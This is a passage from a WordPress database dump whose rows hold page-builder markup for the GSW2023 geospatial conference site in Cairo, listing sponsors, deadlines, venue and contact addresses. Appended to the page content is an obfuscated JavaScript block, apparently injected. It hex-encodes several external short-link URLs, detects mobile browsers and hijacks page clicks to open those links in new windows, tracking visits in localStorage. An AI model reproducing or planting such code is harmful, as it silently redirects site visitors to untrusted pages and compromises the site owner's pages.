width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):</strong></p>\n<p><strong>15 April 2023</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]<strong>Payment of Registration is Opened Now</strong></p>\n<p><strong><a href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\">Conference Venue Special Rate Booking is Opened Now</a></strong>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-16 20:28:20','2023-04-16 20:28:20','',3066,'https://gsw2023.com/?p=4056',0,'revision','',0),
(4057,1,'2023-04-16 20:29:04','2023-04-16 20:29:04','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze 